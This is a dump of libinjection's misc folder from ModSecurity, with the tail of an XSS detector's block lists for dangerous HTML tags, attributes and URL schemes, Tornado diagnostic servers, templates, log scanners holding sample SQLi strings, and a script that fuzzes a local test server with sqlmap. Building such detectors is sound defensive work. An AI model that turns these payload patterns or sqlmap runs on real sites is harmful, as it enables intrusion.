"DATAFORMATAS", "HREF", "SCROLL", "SRC", "STYLE", "SRCDOC", NULL }; */ static const char* BLACKTAG[] = { "APPLET" /* , "AUDIO" */ , "BASE" , "COMMENT" /* IE http://html5sec.org/#38 */ , "EMBED" /* , "FORM" */ , "FRAME" , "FRAMESET" , "HANDLER" /* Opera SVG, effectively a script tag */ , "IFRAME" , "IMPORT" , "ISINDEX" , "LINK" , "LISTENER" /* , "MARQUEE" */ , "META" , "NOSCRIPT" , "OBJECT" , "SCRIPT" , "STYLE" /* , "VIDEO" */ , "VMLFRAME" , "XML" , "XSS" , NULL }; static int cstrcasecmp_with_null(const char *a, const char *b, size_t n) { char ca; char cb; /* printf("Comparing to %s %.*s\n", a, (int)n, b); */ while (n-- > 0) { cb = *b++; if (cb == '\0') continue; ca = *a++; if (cb >= 'a' && cb <= 'z') { cb -= 0x20; } /* printf("Comparing %c vs %c with %d left\n", ca, cb, (int)n); */ if (ca != cb) { return 1; } } if (*a == 0) { /* printf(" MATCH \n"); */ return 0; } else { return 1; } } /* * Does an HTML encoded binary string (const char*, length) start with * a all uppercase c-string (null terminated), case insensitive! * * also ignore any embedded nulls in the HTML string! * * return 1 if match / starts with * return 0 if not */ static int htmlencode_startswith(const char *a, const char *b, size_t n) { size_t consumed; int cb; int first = 1; /* printf("Comparing %s with %.*s\n", a,(int)n,b); */ while (n > 0) { if (*a == 0) { /* printf("Match EOL!\n"); */ return 1; } cb = html_decode_char_at(b, n, &consumed); b += consumed; n -= consumed; if (first && cb <= 32) { /* ignore all leading whitespace and control characters */ continue; } first = 0; if (cb == 0) { /* always ignore null characters in user input */ continue; } if (cb == 10) { /* always ignore vertical tab characters in user input */ /* who allows this?? */ continue; } if (cb >= 'a' && cb <= 'z') { /* upcase */ cb -= 0x20; } if (*a != (char) cb) { /* printf(" %c != %c\n", *a, cb); */ /* mismatch */ return 0; } a++; } return (*a == 0) ? 1 : 0; } static int is_black_tag(const char* s, size_t len) { const char** black; if (len < 3) { return 0; } black = BLACKTAG; while (*black != NULL) { if (cstrcasecmp_with_null(*black, s, len) == 0) { /* printf("Got black tag %s\n", *black); */ return 1; } black += 1; } /* anything SVG related */ if ((s[0] == 's' || s[0] == 'S') && (s[1] == 'v' || s[1] == 'V') && (s[2] == 'g' || s[2] == 'G')) { /* printf("Got SVG tag \n"); */ return 1; } /* Anything XSL(t) related */ if ((s[0] == 'x' || s[0] == 'X') && (s[1] == 's' || s[1] == 'S') && (s[2] == 'l' || s[2] == 'L')) { /* printf("Got XSL tag\n"); */ return 1; } return 0; } static attribute_t is_black_attr(const char* s, size_t len) { stringtype_t* black; if (len < 2) { return TYPE_NONE; } if (len >= 5) { /* JavaScript on.* */ if ((s[0] == 'o' || s[0] == 'O') && (s[1] == 'n' || s[1] == 'N')) { /* printf("Got JavaScript on- attribute name\n"); */ return TYPE_BLACK; } /* XMLNS can be used to create arbitrary tags */ if (cstrcasecmp_with_null("XMLNS", s, 5) == 0 || cstrcasecmp_with_null("XLINK", s, 5) == 0) { /* printf("Got XMLNS and XLINK tags\n"); */ return TYPE_BLACK; } } black = BLACKATTR; while (black->name != NULL) { if (cstrcasecmp_with_null(black->name, s, len) == 0) { /* printf("Got banned attribute name %s\n", black->name); */ return black->atype; } black += 1; } return TYPE_NONE; } static int is_black_url(const char* s, size_t len) { static const char* data_url = "DATA"; static const char* viewsource_url = "VIEW-SOURCE"; /* obsolete but interesting signal */ static const char* vbscript_url = "VBSCRIPT"; /* covers JAVA, JAVASCRIPT, + colon */ static const char* javascript_url = "JAVA"; /* skip whitespace */ while (len > 0 && (*s <= 32 || *s >= 127)) { /* * HEY: this is a signed character. * We are intentionally skipping high-bit characters too * since they are not ASCII, and Opera sometimes uses UTF-8 whitespace. * * Also in EUC-JP some of the high bytes are just ignored. */ ++s; --len; } if (htmlencode_startswith(data_url, s, len)) { return 1; } if (htmlencode_startswith(viewsource_url, s, len)) { return 1; } if (htmlencode_startswith(javascript_url, s, len)) { return 1; } if (htmlencode_startswith(vbscript_url, s, len)) { return 1; } return 0; } int libinjection_is_xss(const char* s, size_t len, int flags) { h5_state_t h5; attribute_t attr = TYPE_NONE; libinjection_h5_init(&h5, s, len, (enum html5_flags) flags); while (libinjection_h5_next(&h5)) { if (h5.token_type != ATTR_VALUE) { attr = TYPE_NONE; } if (h5.token_type == DOCTYPE) { return 1; } else if (h5.token_type == TAG_NAME_OPEN) { if (is_black_tag(h5.token_start, h5.token_len)) { return 1; } } else if (h5.token_type == ATTR_NAME) { attr = is_black_attr(h5.token_start, h5.token_len); } else if (h5.token_type == ATTR_VALUE) { /* * IE6,7,8 parsing works a bit differently so * a whole

XSS Test

{{ args[1] }}
modsecurity-v3.0.4/others/libinjection/misc/tokens.html0000644000175000017500000000317513607066311023617 0ustar zimmerlezimmerle{% extends "base.html" %} {% block title %}libinjection sqli tokens diagnostic{% end %} {% block body %}

libinjection {{ version }} tokens diagnostics

Enter text to be analyzed in form below or directly modify the query string:


{% if len(formvalue) %}
{% for p in parsed %} {% if p['sqli'] %}
{% else %}
{% end %}

{{ p['quote']}} quotes / {{ p['comment'] }} comments: SQLi {{ p['sqli'] }}

Fingerprint: {{ p['fingerprint'] }}

Raw Tokens

{% for i in p['tokens'] %} {% end %}
typevalue
{{ i[0] }}{{ i[1] }}

Folded

{% for i in p['folds'] %} {% end %}
typevalue
{{ i[0] }}{{ i[1] }}

{% end %} {% end %} {% end %} modsecurity-v3.0.4/others/libinjection/misc/static/0000755000175000017500000000000013607066311022707 5ustar zimmerlezimmerlemodsecurity-v3.0.4/others/libinjection/misc/static/robots.txt0000644000175000017500000000003113607066311024752 0ustar zimmerlezimmerleUser-agent: * Disallow: modsecurity-v3.0.4/others/libinjection/misc/static/favicon.png0000644000175000017500000000607013607066311025045 0ustar zimmerlezimmerlePNG  IHDR@@% pHYs   IDAThZYPTW}AwN+I(` 2!S eRe0ijlS5$F'ਣ5DEhE, Mw{.+N@4U#irf&93B}p8:eibqqz}{{BHMMeˌ@sss|~=7n8p@FFFYiP(F \zO?]*#4Hjjj*))ݺeD$ aqm׮]*.tNDZ:a/R9]_Aފ:q||4%g@Ҳo߾_=99ZFG^FzZm4zwȑ={[YYYǰᎎ\ˢG.^ݾw&'x7jdxZauvlhK%MioH$o񛼼HE~L(pYL^yGw"h959QdqWB$Cv!+v y_hRr+dnЬ^R [<EQզT*߯hƋ/u}.&ɬҘ4~M#w ]*η~ E@Ztzs#b6IsrLMUa('|G=``EѐlN.O>-Xv]QA㷘m PnaM##X QT3AzOj 6>6zlvʲRXB)wLzzzdB];mZO@x2X"(0\2ǰǎ5֯+**c8@Ӷj`=a ~0~PAD]X"0MQ4'L9++X~?sBxh@e_&y#zz<_~/ 3)& `RMř4qQc hp2ԯ I2D(AAi3=~`]% Xaa2fX?IN7QnQ4tY(Ky/tj6iBB#[>E/'3[$ೈ0́c2o`ll"Х0]W>M"tixŗIJ)zaZ ۲cxV`_& p:@A2P]Oo5L@f]%&t `?|af&% yI1w!zNQ$FQ(6t. zS1}^1px, 4(ǭ?7F w[[_/~EP pr0nb(F>W D0N\6I)b=>"Q2a.F_Q[ ݟ8qJ//+y]_Ԑt>Mbb ¡ D5_YW/@fPCBرfVzzFfFfl$tnS͈ݿT,(zw?l>٢ddఛIP(o^.aiн ǂ!@?Np4ΜҨl1T)Z͛," 8b;||cKDވA(z͛Y}cf'{1LlZPJjjJ "6Å8ˇ;tJRI%~4!キfs~N i';]ĴT>_f ;?ƴCZ;rZw*l]$a,3::*JV$C?py@!tpmd1t&aPZ$Qv+k=%":N'I230P(PkiH64IJ@ :lVדP_ Y@hVUm& Z9].$@p0p8# 'k?]T< XwtD/ \ r:GGFsMu5essav"UvL4=sNv.P 8uvfSڵk z ?KOGJezAJ!'M$,Vٺt׹>;p'[Fm2M@-(+-)CW*SPnKmEE9Ի/?gΜD"LOq=䟼+s+!ޠXOINR<`?@0NOW)lk빞)ph v.Ϡ6 rsSS@3U`0_ ֭[E־~MzZ\놂`YMF#չP(~bX\KncczZFJJ2|;D܎gD"goRq8,#On7{z1@-HJVPeBx?zeڡih;R*}20'=RYZZrOk/nėڳa8y|0!FkY6o.+q!\*A?=H,xnw=z|lMX"sV9*זGGX,]SɃRj۶-ί/:8dfA1=`w!O!n߾5U.N'I\` ֺ MΆfn{==#"ɠ֯nz(Cw@aX@<ˆ\6p&vPyreyY CP μO̯-џtqf$?Y??_3 ,N|e&IENDB`modsecurity-v3.0.4/others/libinjection/misc/static/favicon.ico0000644000175000017500000001027613607066311025036 0ustar zimmerlezimmerle  ( @   |}vuxonž||WTTGGeþþMLZ#LO__f4;?H6>&ILjg_9>HQLSBJ5<%IL!'MUU[\bLS3;$IL&-ZachlqT[3;\_,2kprw}afRZ-228w{>BML9=Uh9hlm> PuM 'jK…sb#dB1RtbmJHl1x(Rf"$HYЛVY<5o<eef

.䒣YH%\2B$" 7R `C> #&r #(R *" -I -&C /N 2x0*+H8#JͰb31PBH,AuLk"r+ *"2*͠bB$x+(R1?'Ȣ%&= )": "H" 232% 2 )pm1Dk" Kuӊ#m%#0r 4ӓ7%B11bB)̲%@E4`H, )HE#JqWXb 8F36GH2:@R.@ AlmWO$A 0 and arg[0] == 'tokens': return self.get_tokens() else: return self.get_fingerprints() def get_tokens(self): ids = self.request.arguments.get('id', []) if len(ids) == 1: formvalue = ids[0] else: formvalue = '' val = urllib.unquote(formvalue) parsed = [] parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI)) parsed.append(alltokens(val, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL)) parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI)) parsed.append(alltokens(val, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL)) parsed.append(alltokens(val, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL)) self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate') self.add_header('Pragma', 'no-cache') self.add_header('Expires', '0') self.add_header('X-Content-Type-Options', 'nosniff') self.add_header('X-XSS-Protection', '0') self.render("tokens.html", title='libjection sqli token parsing diagnostics', version = libinjection.version(), parsed=parsed, formvalue=val, ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''), ssl_cipher=self.request.headers.get('X-SSL-Cipher', '') ) def get_fingerprints(self): #unquote = urllib.unquote #detectsqli = libinjection.detectsqli ids = self.request.arguments.get('id', []) if len(ids) == 1: formvalue = ids[0] else: formvalue = '' args = [] extra = {} qssqli = False sqlstate = libinjection.sqli_state() allfp = {} for name,values in self.request.arguments.iteritems(): if name == 'type': continue fps = [] val = values[0] val = urllib.unquote(val) if len(val) == 0: continue libinjection.sqli_init(sqlstate, val, 0) pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI) issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate)) fps.append(['unquoted', 'ansi', issqli, pat]) pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL) issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate)) fps.append(['unquoted', 'mysql', issqli, pat]) pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI) issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate)) fps.append(['single', 'ansi', issqli, pat]) pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL) issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate)) fps.append(['single', 'mysql', issqli, pat]) pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL) issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate)) fps.append(['double', 'mysql', issqli, pat]) allfp[name] = { 'value': breakify(breakapart(val)), 'fingerprints': fps } for name,values in self.request.arguments.iteritems(): if name == 'type': continue for val in values: # do it one more time include cut-n-paste was already url-encoded val = urllib.unquote(val) if len(val) == 0: continue # swig returns 1/0, convert to True False libinjection.sqli_init(sqlstate, val, 0) issqli = bool(libinjection.is_sqli(sqlstate)) # True if any issqli values are true qssqli = qssqli or issqli val = breakapart(val) pat = sqlstate.fingerprint if not issqli: pat = 'see below' args.append([name, val, issqli, pat]) self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate') self.add_header('Pragma', 'no-cache') self.add_header('Expires', '0') self.add_header('X-Content-Type-Options', 'nosniff') self.add_header('X-XSS-Protection', '0') self.render("form.html", title='libjection sqli diagnostic', version = libinjection.version(), is_sqli=qssqli, args=args, allfp = allfp, formvalue=formvalue, ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''), ssl_cipher=self.request.headers.get('X-SSL-Cipher', '') ) import os settings = { "static_path": os.path.join(os.path.dirname(__file__), "static"), "template_path": os.path.join(os.path.dirname(__file__), "."), "xsrf_cookies": False, "gzip": False } application = tornado.web.Application([ (r"/diagnostics", NullHandler), (r'/xsstest', XssTestHandler), (r'/bootstrap/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/bootstrap' }), (r'/jquery/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/jquery' }), (r'/robots.txt', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}), (r'/favicon.ico', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}), (r"/([a-z-]*)", PageHandler) ], **settings) if __name__ == "__main__": tornado.options.parse_command_line() logging.basicConfig(level=logging.DEBUG, format="%(asctime)s %(process)d %(message)s") application.listen(8888) tornado.ioloop.IOLoop.instance().start() modsecurity-v3.0.4/others/libinjection/misc/run_sqlmap.sh0000755000175000017500000000147513607066311024147 0ustar zimmerlezimmerle#!/bin/bash # Starts a bogus webserver that logs all input # Then runs sqlmap # ./nullserver.py --logging=none & if [ ! -d "sqlmap" ]; then git clone https://github.com/sqlmapproject/sqlmap.git else (cd sqlmap; git pull) fi SQLMAP=./sqlmap/sqlmap.py URL=http://127.0.0.1:8888 HPP= ${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1 ${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5 ${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo HPP=--hpp ${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1 ${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5 ${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo curl -o /dev/null ${URL}/shutdown modsecurity-v3.0.4/others/libinjection/misc/nullserver.py0000755000175000017500000000537213607066311024205 0ustar zimmerlezimmerle#!/usr/bin/env python # A 'nullserver' that accepts input and generates output # to trick sqlmap into thinking it's a database-driven site # import sys import logging import urllib import tornado.httpserver import tornado.ioloop import tornado.web import libinjection class ShutdownHandler(tornado.web.RequestHandler): def get(self): global fd fd.close() sys.exit(0) class CountHandler(tornado.web.RequestHandler): def get(self): global count self.write(str(count) + "\n") def boring(arg): if arg == '': return True if arg == 'foo': return True if arg == 'NULL': return True try: float(arg) return True except ValueError: pass return False; class NullHandler(tornado.web.RequestHandler): def get(self): global fd global count params = self.request.arguments.get('id', []) sqli = False if len(params) == 0 or (len(params) == 1 and boring(params[0])): # if no args, or a single value with uninteresting input # then just exit self.write("safe") return for arg in params: sqli = libinjection.detectsqli(arg) if sqli: break # we didn't detect it :-( if not sqli: count += 1 args = [ arg.strip() for arg in params ] #fd.write(' | '.join(args) + "\n") for arg in args: extra = {} sqli = libinjection.detectsqli(arg, extra) logging.error("\t" + arg + "\t" + str(sqli) + "\t" + extra['fingerprint'] + "\n") #for arg in param: # fd.write(arg + "\n") # #fd.write(urllib.quote_plus(arg) + "\n") self.set_status(500) self.write("safe") else: self.write("sqli") import os settings = { "static_path": os.path.join(os.path.dirname(__file__), "static"), "cookie_secret": "yo mama sayz=", "xsrf_cookies": True, "gzip": False } application = tornado.web.Application([ (r"/null", NullHandler), (r"/shutdown", ShutdownHandler), (r"/count", CountHandler) ], **settings) if __name__ == "__main__": global fd global count count = 0 fd = open('./sqlmap-false-negatives.txt', 'w') import tornado.options #tornado.options.parse_config_file("/etc/server.conf") tornado.options.parse_command_line() http_server = tornado.httpserver.HTTPServer(application) http_server.listen(8888) tornado.ioloop.IOLoop.instance().start() modsecurity-v3.0.4/others/libinjection/misc/mysql_implicit_tests.py0000755000175000017500000000115113607066311026254 0ustar zimmerlezimmerle#!/usr/bin/python mysql_ops = ( 'AND', '&&', '=', '&', '|', '^', 'DIV', '/', '<=>', '>=', '>', '<<', '<=', '<', 'LIKE', '-', '%', 'MOD', '!=', '<>', 'NOT LIKE', 'NOT REGEXP', 'OR', '||', '+', 'REGEXP', '>>', 'RLIKE', 'NOT RLIKE', 'SOUNDS LIKE', '*', 'XOR' ) print '# mysql implicit conversions tests' for op in mysql_ops: if op == '+': op = '%2B' print "A' {0} 'B".format(op) print "A '{0}' B".format(op) print "'{0}'".format(op) print "' {0} '".format(op) modsecurity-v3.0.4/others/libinjection/misc/modsecurity-merge.sh0000755000175000017500000000260613607066311025427 0ustar zimmerlezimmerle#!/bin/bash # # Sync ModSecurity / libinjection # # explode on error set -e # # CLONE LIBINJECTION # if [ ! -d libinjection ]; then git clone https://github.com/client9/libinjection.git else (cd libinjection; git pull) fi pwd # # CLONE MODSECURITY # if [ ! -d ModSecurity ]; then git clone https://github.com/client9/ModSecurity.git else ( cd ModSecurity; git pull ) fi pwd # # Use right branch # (cd ModSecurity; git checkout remotes/trunk ) pwd # # COPY IN NEW LIBINJECTION # cp libinjection/COPYING.txt ModSecurity/apache2/ cp libinjection/c/libinjection.h ModSecurity/apache2/libinjection cp libinjection/c/libinjection_sqli.c ModSecurity/apache2/libinjection cp libinjection/c/libinjection_sqli.h ModSecurity/apache2/libinjection cp libinjection/c/libinjection_sqli_data.h ModSecurity/apache2/libinjection # # REGENERATE / BUILD # cd ModSecurity ./autogen.sh ./configure make make distclean # # ADD NEW BITS # git add apache2/libinjection/COPYING.txt git add apache2/libinjection/libinjection.h git add apache2/libinjection/libinjection_sqli.h git add apache2/libinjection/libinjection_sqli.c git add apache2/libinjection/libinjection_sqli_data.h # this file seems to get modified, reset just to be safe git checkout standalone/Makefile.in git commit -m 'libinjection sync' # # PUSH TO SPECIAL BRANCH # echo "pushing to remotes/trunk" git push origin remotes/trunk # # PROFIT # modsecurity-v3.0.4/others/libinjection/misc/mdgen.sh0000755000175000017500000000033013607066311023045 0ustar zimmerlezimmerle#!/bin/bash fname=$1 echo '{% extends "base.html" %}' echo '{% block body %}' #github-markup $fname curl -H 'Content-Type: text/x-markdown' --data-binary @$fname https://api.github.com/markdown/raw echo '{% end %}' modsecurity-v3.0.4/others/libinjection/misc/logtable.html0000644000175000017500000000065113607066311024101 0ustar zimmerlezimmerle{% autoescape xhtml_escape %} {% extends "base.html" %} {% block title %} Recent Queries {% end %} {% block body %} {% for log in table %} {% if log[2] %} {% else %} {% end %} {% end %}
{{ log[4] }} {{ log[1] }} {{ log[3] }} {{ log[2] }}


Generated on {{ now }}

{% end %} modsecurity-v3.0.4/others/libinjection/misc/logscanner2.py0000755000175000017500000001413013607066311024211 0ustar zimmerlezimmerle#!/usr/bin/env python import datetime import json import sys from urlparse import * import urllib import libinjection from tornado import template from tornado.escape import * import re import calendar months = { 'Jan':'01', 'Feb':'02', 'Mar':'03', 'Apr':'04', 'May':'05', 'Jun':'06', 'Jul':'07', 'Aug':'08', 'Sep':'09', 'Oct':'10', 'Nov':'11', 'Dec':'12' } # "time_iso8601":"2013-08-04T03:51:18+00:00" def parse_date(datestr): elems = ( datestr[7:11], months[datestr[3:6]], datestr[0:2], datestr[12:14], datestr[15:17], datestr[18:20], ) return ( "{0}-{1}-{2}T{3}:{4}:{5}+00:00".format(*elems), calendar.timegm( [ int(i) for i in elems] ) ) apachelogre = re.compile(r'^(\S*) (\S*) (\S*) \[([^\]]+)\] \"([^"\\]*(?:\\.[^"\\]*)*)\" (\S*) (\S*) \"([^"\\]*(?:\\.[^"\\]*)*)\" \"([^"]*)\" \"([^"]*)\"') def parse_apache(line): mo = apachelogre.match(line) if not mo: return None (time_iso, timestamp) = parse_date(mo.group(4)) try: (method, uri, protocol) = mo.group(5).split(' ', 2) except ValueError: (method, uri, protocol) = ('-', '-', '-') data = { 'remote_addr': mo.group(1), 'time_iso8601': time_iso, 'timestamp' : timestamp, 'request_protocol': protocol, 'request_method': method, 'request_uri': uri, 'request_length': '', 'request_time': '', 'status': mo.group(6), 'bytes_sent': '', 'body_bytes-sent': int(mo.group(7)), 'http_referrer': mo.group(8), 'http_user_agent': mo.group(9), 'ssl_cipher': '', 'ssl_protocol': '' } return data # http://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks-in-python def chunks(l, n): """ Yield successive n-sized chunks from l. """ for i in xrange(0, len(l), n): yield l[i:i+n] def breakify(s): output = "" for c in chunks(s, 40): output += c if ' ' not in c: output += ' ' return output def doline(line): line = line.replace("\\x", "%").strip() try: data = json.loads(line) except ValueError, e: data = parse_apache(line) if data is None: sys.stderr.write("BAD LINE: {0}\n".format(line)) return None if not data.get('request_uri','').startswith("/diagnostics"): return None urlparts = urlparse(data['request_uri']) if len(urlparts.query) == 0: return None qsl = [ x.split('=', 1) for x in urlparts.query.split('&') ] target = None for k,v in qsl: if k == 'id': target = v break if target is None: #print "no 'id'" return None # part one, normal decode target = urllib.unquote_plus(target) # do it again, but preserve '+' target = urllib.unquote(target) sstate = libinjection.sqli_state() # BAD the string created by target.encode is stored in # sstate but not reference counted, so it can get # deleted by python # libinjection.sqli_init(sstate, target.encode('utf-8'), 0) # instead make a temporary var in python # with the same lifetime as sstate (above) try: targetutf8 = target.encode('utf-8') #targetutf8 = target except UnicodeDecodeError, e: targetutf8 = target #if type(target) == str: # sys.stderr.write("Target is a string\n") #if type(target) == unicode: # sys.stderr.write("Target is unicde\n") #sys.stderr.write("OOps: {0}\n".format(e)) #sys.stderr.write("Encode error: {0}\n".format(target)) try: libinjection.sqli_init(sstate, targetutf8, 0) except TypeError: sys.stderr.write("fail in decode: {0}".format(targetutf8)) if type(target) == str: sys.stderr.write("Target is a string\n") if type(target) == unicode: sys.stderr.write("Target is unicde\n") return None sqli = bool(libinjection.is_sqli(sstate)) return (target, sqli, sstate.fingerprint, data['remote_addr']) if __name__ == '__main__': s = """ 174.7.27.149 - - [29/Jul/2013:01:30:19 +0000] "GET /diagnostics?id=x|x||1&type=fingerprints HTTP/1.1" 200 1327 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36" "-" """ s = """ {"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=1+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 } {"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=2+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 } """ if len(sys.argv) == 2: fh = open(sys.argv[1], 'r') else: fh = sys.stdin targets = set() table = [] for line in fh: parts = doline(line.strip()) if parts is None: continue # help it render in HTML if parts[0] in targets: continue else: targets.add(parts[0]) # add link # add form that might render ok in HTML # is sqli # fingerprint table.append( ( "/diagnostics?id=" + url_escape(parts[0]), breakify(parts[0].replace(',', ', ').replace('/*', ' /*')), parts[1], parts[2], parts[3] ) ) table = reversed(table) loader = template.Loader(".") txt = loader.load("logtable.html").generate( table=table, now = str(datetime.datetime.now()), ssl_protocol='', ssl_cipher='' ) print txt modsecurity-v3.0.4/others/libinjection/misc/logscanner.py0000755000175000017500000000236413607066311024135 0ustar zimmerlezimmerle#!/usr/bin/env python import sys import re import libinjection import urllib import urlparse logre = re.compile(r' /diagnostics\?([^ ]+) HTTP') notsqli = set([ '1ov', 'UEvEv', 'v', 'Uv', 'Uv,', 'UoEvE', '1v', 'sov', '1nn', 'UonnE', 'no1', 'Evk', 'E1k', 'E11k', 'Ek', 'Uv,Ev', 'UvEvk', 'UvEv,', 'Uvon' ]) def doline(logline): """ ...GET /diagnostics?id=%22union+select HTTP/1.1 """ mo = logre.search(logline) if not mo: return sqli= False fp = None for key, val in urlparse.parse_qsl(mo.group(1)): val = urllib.unquote(val) extra = {} argsqli = libinjection.detectsqli(val, extra) if argsqli: fp = extra['fingerprint'] print urllib.quote(val) sqli = sqli or argsqli if False: # and not sqli: #print "\n---" #print mo.group(1) for key, val in urlparse.parse_qsl(mo.group(1)): val = urllib.unquote(val) extra = {} argsqli = libinjection.detectsqli(val, extra) if not argsqli and extra['fingerprint'] not in notsqli: print "NO", extra['fingerprint'], mo.group(1) print " ", val if __name__ == '__main__': for line in sys.stdin: doline(line) modsecurity-v3.0.4/others/libinjection/misc/home.md0000644000175000017500000000356713607066311022705 0ustar zimmerlezimmerleLIBINJECTION ========================== Libinjection is a small C library to detect SQLi attacks in user input with the following goals: * Open. Source code is on [GitHub](https://github.com/client9/libinjection/). * Low _false-positives_. When there are high false positives, people tend to turn off any WAF or protection. * Excellent detection of SQLi. * High performance (currently [over 500,000 TPS](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-speed/latest/console.txt)) * Easy to test and QA * Easy to integrate and extend ### [Try it now](/diagnostics) ### Easy to integrate * Standard C code, and compiles as C99 and C++, with bindings to * [Python](https://github.com/client9/libinjection/wiki/doc-sqli-python) * [PHP](https://github.com/client9/libinjection/wiki/doc-sqli-php) * [Lua](https://github.com/client9/libinjection/tree/master/lua) * Small - about [1500 lines of code](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-loc/latest/console.txt) in three files * Compiles on Linux/Unix/BSD, Mac and Windows * No threads used and thread safe * No recursion * No (heap) memory allocation * No extenal library dependencies * [400+ unit tests](https://github.com/client9/libinjection/tree/master/tests) * [98% code coverage](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-coverage-unittest/latest/lcov-html/libinjection/src/index.html) * [BSD License](https://github.com/client9/libinjection/blob/master/COPYING) Third-Party Ports --------------------- * [java](https://github.com/Kanatoko/libinjection-Java) * At least two .NET ports exists * Another python wrapper Applications --------------------- * [ModSecurity](http://www.modsecurity.org/) - since 2.7.4 release * [IronBee](https://www.ironbee.com) - since May 2013 * Proprietary Honeypot * Proprietary WAF, Russia * Proprietary WAF, Japan modsecurity-v3.0.4/others/libinjection/misc/home.html0000644000175000017500000000557113607066311023246 0ustar zimmerlezimmerle{% extends "base.html" %} {% block body %}

LIBINJECTION

Libinjection is a small C library to detect SQLi attacks in user input with the following goals:

  • Open. Source code is on GitHub.
  • Low false-positives. When there are high false positives, people tend to turn off any WAF or protection.
  • Excellent detection of SQLi.
  • High performance (currently over 500,000 TPS)
  • Easy to test and QA
  • Easy to integrate and extend

Try it now

Easy to integrate

Third-Party Ports

  • java
  • At least two .NET ports exists
  • Another python wrapper

Applications

  • ModSecurity - since 2.7.4 release
  • IronBee - since May 2013
  • Proprietary Honeypot
  • Proprietary WAF, Russia
  • Proprietary WAF, Japan
{% end %} modsecurity-v3.0.4/others/libinjection/misc/gittag.sh0000755000175000017500000000071313607066311023237 0ustar zimmerlezimmerle#!/bin/bash set -e # automated basic git tagging # 1) edit the version number in # c/libinjection_sqli.c # pyton/setup.py # 2) git add and commit # 3) run this # 4) done! # # get tag number TAG=`grep 'LIBINJECTION_VERSION' ../c/libinjection_sqli.c | awk -F '"' '{print $2}' | tr -d '[[:space:]]'` TAG="v${TAG}" echo "TAG = ${TAG}" echo "Tagging locally" git tag -a "${TAG}" -m ${TAG} echo "Sharing..." git push origin "${TAG}" git tag echo "DONE" modsecurity-v3.0.4/others/libinjection/misc/form.html0000644000175000017500000000434013607066311023252 0ustar zimmerlezimmerle{% extends "base.html" %} {% block title %}libinjection sqli diagnostic{% end %} {% block body %}

libinjection {{ version }} diagnostics

Enter text to be analyzed in form below or directly modify the query string:


{% if len(args) %}

SQLi Detected: {{ is_sqli }}

{% if is_sqli %} Is this wrong? {% else %} Is this wrong? {% end %}

{% for arg in args %} {% if arg[2] %} {% else %} {% end %} {% end %}
namevaluesqli?fingerprint
{{ arg[0] }}{{ arg[1] }}{{ arg[2] }}{{ arg[3] }}
{% end %}

Fingerprints in all contexts

{% for name, v in allfp.iteritems() %}

query string: "{{ name }}"

{{ v['value'] }}

{% for arg in v['fingerprints'] %} {% if arg[2] %} {% else %} {% end %} {% end %}
quoting contextcomment styleis sqlifingerprint
{{ arg[0] }} {{ arg[1] }} {{ arg[2] }} {{ arg[3] }}
{% end %}

Notes:

  • The form is a convience for ad-hoc testing. In addition, you can also enter any input by directly modifying the query string. There is no CSRF token.
